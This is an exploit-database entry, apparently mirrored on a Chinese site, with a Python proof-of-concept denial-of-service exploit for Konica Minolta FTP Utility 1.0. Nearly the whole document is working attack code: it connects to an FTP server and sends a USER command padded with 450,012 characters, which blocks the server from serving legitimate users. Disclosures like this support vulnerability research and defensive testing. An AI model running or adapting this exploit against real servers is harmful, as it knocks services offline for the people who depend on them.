Konica Minolta FTP Utility 1.0 – Remote Denial of Service (PoC)

  • 作者: Shankar Damodaran
    日期: 2015-08-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/37908/
  • #!/usr/bin/python
    # Exploit Title: Konica Minolta FTP Utility 1.0 Remote DoS PoC
    # Date: 21-08-2015
    # Exploit Author: Shankar Damodaran
    # Vendor Homepage: http://www.konicaminolta.com/
    # Software Link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
    # Version: 1.0
    # Tested on: Microsoft Windows XP Professional SP3 English
    
    
    import socket
    
    # The ip address of the remote host
    ftphost = '192.168.1.7'
    # The port of the remote host
    ftpport = 21
    
    # Fuzzed packet of a certain length, Appending this to the USER command and requesting the remote ftp server denies requests for other legitimate users. 
    crafted_user_name= "B" * 450012 # DoS
    
    # Establishing connection
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    connect=s.connect((ftphost,ftpport))
    s.recv(1024)
    
    # Sending the evil input.
    s.send('USER' + crafted_user_name +'\r\n')
    
    # Once the packet has been sent, the DoS will occur on the remote FTP server. By sending an interrupt through (Ctrl+C), will resume the FTP server from DoS. (Note : The FTP server will not get crashed)
    s.send('QUIT \r\n')	
    s.close()
    
    # End of PoC - Shankar Damodaran